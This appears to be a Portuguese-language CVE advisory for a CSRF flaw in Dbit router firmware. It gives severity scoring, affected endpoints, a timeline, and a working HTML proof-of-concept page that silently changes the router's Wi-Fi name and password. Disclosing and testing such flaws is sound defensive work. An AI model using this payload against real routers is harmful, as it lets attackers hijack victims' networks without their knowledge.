
Prova de conceito para CVE-2026-36956, uma vulnerabilidade de CSRF no firmware do roteador Dbit que permite alterações de configuração não autorizadas por meio de requisições forjadas.
ID CVE: CVE-2026-36956 Data: 2026-04-29 Descobridor: Kirubel Solomne Fornecedor: Shenzhen Dibit Network Equipment Co., Ltd. Produto: Roteador Dbit Versão do Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
O firmware V1.0.0 do roteador Dbit não implementa mecanismos de proteção contra CSRF, como tokens anti-CSRF ou validação estrita de Origin/Referer nos endpoints administrativos da API. Um atacante pode criar uma página da web maliciosa que envia solicitações HTTP forjadas para endpoints de configuração. Se um administrador autenticado visitar a página maliciosa, o roteador processa a solicitação forjada como uma ação administrativa legítima.
Pontuação CVSS v3.1: 8.8 (Alta)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Métrica | Valor |
|---|---|
| Vetor de Ataque | Rede |
| Complexidade do Ataque | Baixa |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Necessária |
| Impacto na Confidencialidade | Alto |
| Impacto na Integridade | Alto |
| Impacto na Disponibilidade | Alto |
| Endpoint | Função |
|---|---|
/api/setWlan | Configuração da rede sem fio (SSID, senha) |
/api/setWan | Configuração da WAN |
/api/setSystem | Configuração do sistema |
Salve o seguinte como poc.html e abra-o enquanto um administrador estiver conectado ao roteador:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Comportamento Esperado: A solicitação deve ser rejeitada devido à incompatibilidade do token CSRF. Comportamento Real: O roteador aceita e processa a solicitação forjada.
| Data | Evento |
|---|---|
| 2026-04-29 | Vulnerabilidade descoberta |
| 2026-04-29 | Relatada à MITRE |
| 2026-04-29 | CVE-2026-36956 atribuído |
| 2026-04-29 | Divulgação pública |